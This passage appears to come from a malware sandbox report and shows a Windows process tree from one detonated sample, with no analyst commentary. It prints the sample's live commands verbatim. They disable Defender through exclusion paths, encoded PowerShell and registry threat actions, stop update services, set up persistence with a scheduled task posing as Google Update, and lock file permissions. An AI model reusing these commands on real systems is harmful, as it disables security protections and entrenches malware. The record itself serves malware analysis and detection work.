      Launches sc.exe
      PID:2692
  - - C:\Windows\System32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:9844
  - - C:\Windows\System32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:4016
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:9332
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
    3⤵
    - Creates scheduled task(s)
    PID:3300
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1960
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:10252
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:10732
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:11140
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:10632
- - C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe
    3⤵
    PID:9880
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\cmmon32.exe
    "C:\Windows\SysWOW64\cmmon32.exe"
    3⤵
    PID:10708
- - C:\Windows\SysWOW64\chkdsk.exe
    "C:\Windows\SysWOW64\chkdsk.exe"
    3⤵
    PID:10928
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:8112
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5536
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:5188
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:6568
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:6864
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:10604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    PID:10800
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\starkrqppzsg.xml"
    3⤵
    - Creates scheduled task(s)
    PID:6752
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:7196
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"
    3⤵
    - Creates scheduled task(s)
    PID:3316
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:6264
- - C:\Users\Admin\AppData\Local\Temp\815D.exe
    C:\Users\Admin\AppData\Local\Temp\815D.exe
    3⤵
    PID:10704
- - C:\Users\Admin\AppData\Local\Temp\8F77.exe
    C:\Users\Admin\AppData\Local\Temp\8F77.exe
    3⤵
    PID:4748
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:10952
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:4004
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      PID:3560
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      PID:11444
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      PID:11640
- - C:\Users\Admin\AppData\Local\Temp\A561.exe
    C:\Users\Admin\AppData\Local\Temp\A561.exe
    3⤵
    PID:9764
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\starkrqppzsg.xml"
    3⤵
    - Creates scheduled task(s)
    PID:10908
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    3⤵
    PID:11104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    PID:7196
- - C:\Users\Admin\AppData\Local\Temp\AA11.exe
    C:\Users\Admin\AppData\Local\Temp\AA11.exe
    3⤵
    PID:7204
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:6844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 1456
      4⤵
      Program crash
      PID:5876
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    3⤵
    PID:7360
  - - C:\Windows\System32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:11992
  - - C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:8552
  - - C:\Windows\System32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:10424
  - - C:\Windows\System32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:12136
  - - C:\Windows\System32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:12252
- - C:\Users\Admin\AppData\Local\Temp\C191.exe
    C:\Users\Admin\AppData\Local\Temp\C191.exe
    3⤵
    PID:11844
- - C:\Users\Admin\AppData\Local\Temp\CEF0.exe
    C:\Users\Admin\AppData\Local\Temp\CEF0.exe
    3⤵
    PID:12256
- - C:\Users\Admin\AppData\Local\Temp\D75E.exe
    C:\Users\Admin\AppData\Local\Temp\D75E.exe
    3⤵
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\E44F.exe
    C:\Users\Admin\AppData\Local\Temp\E44F.exe
    3⤵
    PID:7764
- - C:\Users\Admin\AppData\Local\Temp\F298.exe
    C:\Users\Admin\AppData\Local\Temp\F298.exe
    3⤵
    PID:11664
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:11696
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5404
  - - C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      PID:11832
- - C:\Windows\system32\certreq.exe
    "C:\Windows\system32\certreq.exe"
    3⤵
    PID:9896
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
    3⤵
    - Creates scheduled task(s)
    PID:11968
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:11872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    PID:7840
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"
    3⤵
    - Creates scheduled task(s)
    PID:12236
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
    3⤵
    PID:12640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    PID:11416
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    3⤵
    PID:6692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:10228

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8368
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:2880
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1764
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5284
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6724

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:9124
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8480
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5548
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6816
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5484
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DD58.bat" "
1⤵
PID:10156

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\SysWOW64\cmstp.exe"
1⤵
PID:9452
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\dslwsx.exe"
  2⤵
  PID:3936

C:\Users\Admin\AppData\Local\Temp\EE61.exe
C:\Users\Admin\AppData\Local\Temp\EE61.exe
1⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:7412

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:7744

C:\Users\Admin\AppData\Local\Temp\F70C.exe
C:\Users\Admin\AppData\Local\Temp\F70C.exe
1⤵
PID:8516

C:\Users\Admin\AppData\Local\Temp\239.exe
C:\Users\Admin\AppData\Local\Temp\239.exe
1⤵
PID:8848
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:8672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:9992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:9444
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:8248
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:9184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:9172
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:3152
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    PID:6560

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:3680

C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
1⤵
PID:5388

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3920

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XzjGDyJ.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XzjGDyJ.exe 3Y /ESsite_idyez 385118 /S
1⤵
PID:3336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11056
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:12080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:12000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:10516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:11872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9572
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
